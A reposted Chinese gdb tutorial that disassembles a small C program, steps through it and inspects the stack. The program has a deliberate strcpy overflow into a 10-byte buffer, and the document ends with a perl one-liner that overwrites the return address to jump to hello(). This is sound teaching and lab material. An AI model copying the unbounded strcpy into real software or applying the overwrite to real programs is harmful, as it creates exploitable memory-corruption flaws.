gdb简单使用

转自：http://blog.csdn.net/feier7501/article/details/8531803

#include <stdio.h>  

#include <string.h>  

void hello()  

{  

        printf("hello\n");  

}  

  

int fun(char *str)  

{  

        char buf[10];  

        strcpy(buf, str);  

        printf("%s\n", buf);  

        return 0;  

}  

  

int main(int argc, char **argv)  

{  

        int i=0;  

        char *str;  

        str=argv[1];  

        fun(str);  

        return 0;  

}  

编译test.c

gcc -g -o test test.c

 

gdb test

反汇编hello、fun、main这三个函数

(gdb) disass hello

Dump of assembler code for function hello:

0x000000000040057d <+0>: push %rbp

0x000000000040057e <+1>: mov %rsp,%rbp

0x0000000000400581 <+4>: mov $0x400690,%edi

0x0000000000400586 <+9>: callq 0x400460 <puts@plt>

0x000000000040058b <+14>: pop %rbp

0x000000000040058c <+15>: retq

End of assembler dump.

(gdb) disass fun

Dump of assembler code for function fun:

0x000000000040058d <+0>: push %rbp

0x000000000040058e <+1>: mov %rsp,%rbp

0x0000000000400591 <+4>: sub $0x20,%rsp

0x0000000000400595 <+8>: mov %rdi,-0x18(%rbp)

0x0000000000400599 <+12>: mov -0x18(%rbp),%rdx

0x000000000040059d <+16>: lea -0x10(%rbp),%rax

0x00000000004005a1 <+20>: mov %rdx,%rsi

0x00000000004005a4 <+23>: mov %rax,%rdi

0x00000000004005a7 <+26>: callq 0x400450 <strcpy@plt>

0x00000000004005ac <+31>: lea -0x10(%rbp),%rax

0x00000000004005b0 <+35>: mov %rax,%rdi

0x00000000004005b3 <+38>: callq 0x400460 <puts@plt>

0x00000000004005b8 <+43>: mov $0x0,%eax

0x00000000004005bd <+48>: leaveq

0x00000000004005be <+49>: retq

End of assembler dump.

(gdb) disass main

Dump of assembler code for function main:

0x00000000004005bf <+0>: push %rbp

0x00000000004005c0 <+1>: mov %rsp,%rbp

0x00000000004005c3 <+4>: sub $0x20,%rsp

0x00000000004005c7 <+8>: mov %edi,-0x14(%rbp)

0x00000000004005ca <+11>: mov %rsi,-0x20(%rbp)

0x00000000004005ce <+15>: movl $0x0,-0x4(%rbp)

0x00000000004005d5 <+22>: mov -0x20(%rbp),%rax

0x00000000004005d9 <+26>: mov 0x8(%rax),%rax

0x00000000004005dd <+30>: mov %rax,-0x10(%rbp)

0x00000000004005e1 <+34>: mov -0x10(%rbp),%rax

0x00000000004005e5 <+38>: mov %rax,%rdi

0x00000000004005e8 <+41>: callq 0x40058d <fun>

0x00000000004005ed <+46>: mov $0x0,%eax

0x00000000004005f2 <+51>: leaveq

0x00000000004005f3 <+52>: retq

End of assembler dump.

(gdb)

Dump of assembler code for function main:

0x00000000004005bf <+0>: push %rbp

0x00000000004005c0 <+1>: mov %rsp,%rbp

0x00000000004005c3 <+4>: sub $0x20,%rsp

0x00000000004005c7 <+8>: mov %edi,-0x14(%rbp)

0x00000000004005ca <+11>: mov %rsi,-0x20(%rbp)

0x00000000004005ce <+15>: movl $0x0,-0x4(%rbp)

0x00000000004005d5 <+22>: mov -0x20(%rbp),%rax

0x00000000004005d9 <+26>: mov 0x8(%rax),%rax

0x00000000004005dd <+30>: mov %rax,-0x10(%rbp)

0x00000000004005e1 <+34>: mov -0x10(%rbp),%rax

0x00000000004005e5 <+38>: mov %rax,%rdi

0x00000000004005e8 <+41>: callq 0x40058d <fun>

0x00000000004005ed <+46>: mov $0x0,%eax

0x00000000004005f2 <+51>: leaveq

0x00000000004005f3 <+52>: retq

End of assembler dump.

(gdb)

Dump of assembler code for function main:

0x00000000004005bf <+0>: push %rbp

0x00000000004005c0 <+1>: mov %rsp,%rbp

0x00000000004005c3 <+4>: sub $0x20,%rsp

0x00000000004005c7 <+8>: mov %edi,-0x14(%rbp)

0x00000000004005ca <+11>: mov %rsi,-0x20(%rbp)

0x00000000004005ce <+15>: movl $0x0,-0x4(%rbp)

0x00000000004005d5 <+22>: mov -0x20(%rbp),%rax

0x00000000004005d9 <+26>: mov 0x8(%rax),%rax

0x00000000004005dd <+30>: mov %rax,-0x10(%rbp)

0x00000000004005e1 <+34>: mov -0x10(%rbp),%rax

0x00000000004005e5 <+38>: mov %rax,%rdi

0x00000000004005e8 <+41>: callq 0x40058d <fun>

0x00000000004005ed <+46>: mov $0x0,%eax

0x00000000004005f2 <+51>: leaveq

0x00000000004005f3 <+52>: retq

End of assembler dump.

(gdb) b 12

Breakpoint 1 at 0x4005ac: file test.c, line 12.

(gdb) b 21

Breakpoint 2 at 0x4005e1: file test.c, line 21.

(gdb) x/x $rsp

No registers.

(gdb) r AAAA

Starting program: /root/test AAAA

Breakpoint 2, main (argc=2, argv=0x7fffffffe4e8) at test.c:21

21 fun(str);

Missing separate debuginfos, use: debuginfo-install glibc-2.17-157.el7.x86_64

(gdb) x/x $rbp

0x7fffffffe400: 0x00000000

(gdb) x/x $rsp

0x7fffffffe3e0: 0xffffe4e8

(gdb) x/8x $rsp

0x7fffffffe3e0: 0xffffe4e8 0x00007fff 0x00400490 0x00000002

0x7fffffffe3f0: 0xffffe764 0x00007fff 0x00000000 0x00000000

(gdb) p str

$1 = 0x7fffffffe764 "AAAA"

(gdb) si

0x00000000004005e5 21 fun(str);

(gdb) x/8x $rsp

0x7fffffffe3e0: 0xffffe4e8 0x00007fff 0x00400490 0x00000002

0x7fffffffe3f0: 0xffffe764 0x00007fff 0x00000000 0x00000000

(gdb) si

0x00000000004005e8 21 fun(str);

(gdb) x/8x $rsp

0x7fffffffe3e0: 0xffffe4e8 0x00007fff 0x00400490 0x00000002

0x7fffffffe3f0: 0xffffe764 0x00007fff 0x00000000 0x00000000

(gdb) n

Breakpoint 1, fun (str=0x7fffffffe764 "AAAA") at test.c:12

12 printf("%s\n", buf);

(gdb) x/8x $rsp

0x7fffffffe3b0: 0x00000001 0x00000000 0xffffe764 0x00007fff

0x7fffffffe3c0: 0x41414141 0x00000000 0x0040064d 0x00000000

(gdb) x/16x $rsp

0x7fffffffe3b0: 0x00000001 0x00000000 0xffffe764 0x00007fff

0x7fffffffe3c0: 0x41414141 0x00000000 0x0040064d 0x00000000

0x7fffffffe3d0: 0xffffe400 0x00007fff 0x004005ed 0x00000000

0x7fffffffe3e0: 0xffffe4e8 0x00007fff 0x00400490 0x00000002

./test `perl -e 'print "A"x24;print "\x7d\x05\x40\x00"'`